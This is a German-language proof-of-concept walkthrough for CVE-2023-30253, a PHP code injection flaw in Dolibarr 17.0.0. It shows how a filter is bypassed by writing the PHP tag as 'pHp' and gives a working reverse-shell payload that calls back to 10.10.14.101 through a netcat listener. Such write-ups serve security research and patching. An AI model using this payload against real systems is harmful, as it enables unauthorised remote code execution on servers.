
In Dolibarr 17.0.0 mit aktiviertem CMS-Website-Plugin (Core) kann ein authentifizierter Angreifer über eine PHP-Code-Injection, die die Anwendungsbeschränkungen umgeht, Remote-Codeausführung erlangen.
CVE-2023-30253 ist eine Sicherheitslücke in der Dolibarr-Software, die es authentifizierten Benutzern ermöglicht, Remote-Code auszuführen, indem eine Großschreibungs-Manipulationstechnik in injizierten Daten verwendet wird.
Diese Schwachstelle kann von Angreifern zu einer unbefugten Remote-Code-Ausführung führen und stellt eine ernsthafte Bedrohung für die Sicherheit und Integrität der betroffenen Systeme dar. Die Schwachstelle wurde in Dolibarr 17.0.1 behoben.
https://www.swascan.com/security-advisory-dolibarr-17-0-0/
https://github.com/Dolibarr/dolibarr
Das folgende POC zeigt, wie man manuell eine Reverse Shell erhält.

Nach dem Einloggen als Testbenutzer können wir eine Website erstellen/ändern.
.png)
Zuerst erstellen wir eine Website und dann eine Seite.
.png)

Nachdem wir die Website und die Seite erstellt haben, klicken wir auf das Fernglas-Symbol. Dadurch wird unsere erstellte Seite in einem neuen Tab geöffnet.
Klicken Sie nun auf „HTML-Quelltext bearbeiten“.
.png)
Hier können wir versuchen, PHP-Code hinzuzufügen, aber eine Art Filter verhindert, dass wir PHP-Code schreiben. Dies kann leicht umgangen werden, indem man das Format des Wortes php ändert.
.png)
Nachdem wir das Format des Wortes php in pHp geändert haben, können wir sehen, dass es erfolgreich gespeichert wurde.
.png)
Wenn wir zur Seite gehen, sehen wir, dass unser eingefügter PHP-Code funktioniert.
Nun richten wir einen Netcat-Listener ein, um eine Reverse Shell zu erhalten.
.png)
.png)
Dann fügen wir unseren Reverse-Shell-Code <?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.101/1010 0>&1'"); ?> hinzu.
Wenn wir nun die Website öffnen, erhalten wir eine Reverse Shell.
.png)
Wir können den Python-Code verwenden, um es einfacher zu machen.

Netcat-Listener einrichten.

Führen Sie das Skript aus, und wir sollten eine Reverse Shell erhalten.
Autor des Skripts: https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253